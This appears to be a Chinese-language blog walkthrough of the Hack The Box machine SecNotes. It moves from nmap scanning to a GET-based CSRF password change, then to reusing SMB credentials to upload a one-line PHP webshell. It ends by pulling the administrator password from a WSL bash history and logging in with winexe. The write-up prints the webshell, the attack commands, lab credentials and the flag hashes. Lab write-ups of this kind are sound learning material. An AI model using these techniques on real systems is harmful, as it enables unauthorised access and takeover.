[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…

2024-09-06 105 0

信息收集

IP Address Opening Ports
10.10.10.97 TCP:80,445,8808

$ nmap -p- 10.10.10.97 --min-rate 1000 -sC -sV

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
445/tcp  open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

XSRF & SMB Webshell

1.创建用户

http://10.10.10.97/register.php

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图

2.登录

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图1

3.联系页面

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图2

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图3

http://10.10.16.24/test

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图4

联系页面提交URL后靶机会自动访问该链接

4.修改密码

修改密码页面可以通过GET请求进行修改密码,并且不需要提供原始密码

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图5

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图6

5.在反馈联系页面发送链接,让[email protected]靶机访问触发XSRF漏洞

http://10.10.10.97/change_pass.php?password=test123&confirm_password=test123&submit=submit

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图7

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图8

存在SMB凭证,通过SMB上传webshell

\\secnotes.htb\new-site tyler / 92g!mA8BGjOirkL%OG*&

$ smbmap -H 10.10.10.97 -u tyler -p '92g!mA8BGjOirkL%OG*&'

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图9

$ smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' //10.10.10.97/new-site

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图10

$ echo '<?php system($_GET[1]); ?>'>/tmp/shell.php

smb: \> put /tmp/shell.php shell.php

$ curl 'http://10.10.10.97:8808/shell.php?1=whoami'

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图11

User.txt

c820c9c749a18ad20cd753302bcde81d

权限提升

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图12

PS C:\inetpub\new-site> type C:\Users\tyler\Desktop\bash.lnk

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图13

PS C:\inetpub\new-site> \windows\system32\bash.exe

PS C:\inetpub\new-site> Get-ChildItem -Recurse -Path C:\ -Filter "bash.exe"

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图14

PS C:\inetpub\new-site> cd C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root

PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> type .bash_history

从Linux子系统中的.bash_history中获取到管理员密码

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图15

$ winexe -U '.\administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Websh…插图16

Root.txt

da93ba016133741828c0cd57abb916ad


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论